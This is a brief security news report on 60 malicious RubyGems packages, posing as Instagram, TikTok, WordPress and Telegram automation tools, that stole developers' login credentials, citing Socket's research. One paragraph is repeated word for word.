Threat actors have been pilfering developers' credentials using 60 nefarious RubyGems packages impersonating automation tools for various social media sites, including Instagram, X, TikTok, WordPress, Naver, and Telegram, which have amassed more than 275,000 downloads since March 2023, according to BleepingComputer.
Despite having a seemingly legitimate graphical user interface and functionality, the malicious packages most notable of which were WordPress-style automators, SEO tools, and Telegram-style bots allowed the exfiltration of login form-inputed credentials in plaintext, as well as device MAC addresses, and package names, a report from Socket showed. While all of the packages have already been reported to RubyGems, at least 16 remain on the open-source code repository, said Socket researchers, who also discovered credentials stolen by the packages across multiple Russian-speaking dark web marketplaces. Such findings, which follow a recent Socket report detailing malicious RubyGems packages typosquatting the open-source Fastlane plugin, should prompt increased library and publisher scrutiny among software developers, researchers added.
Despite having a seemingly legitimate graphical user interface and functionality, the malicious packages most notable of which were WordPress-style automators, SEO tools, and Telegram-style bots allowed the exfiltration of login form-inputed credentials in plaintext, as well as device MAC addresses, and package names, a report from Socket showed. While all of the packages have already been reported to RubyGems, at least 16 remain on the open-source code repository, said Socket researchers, who also discovered credentials stolen by the packages across multiple Russian-speaking dark web marketplaces. Such findings, which follow a recent Socket report detailing malicious RubyGems packages typosquatting the open-source Fastlane plugin, should prompt increased library and publisher scrutiny among software developers, researchers added.
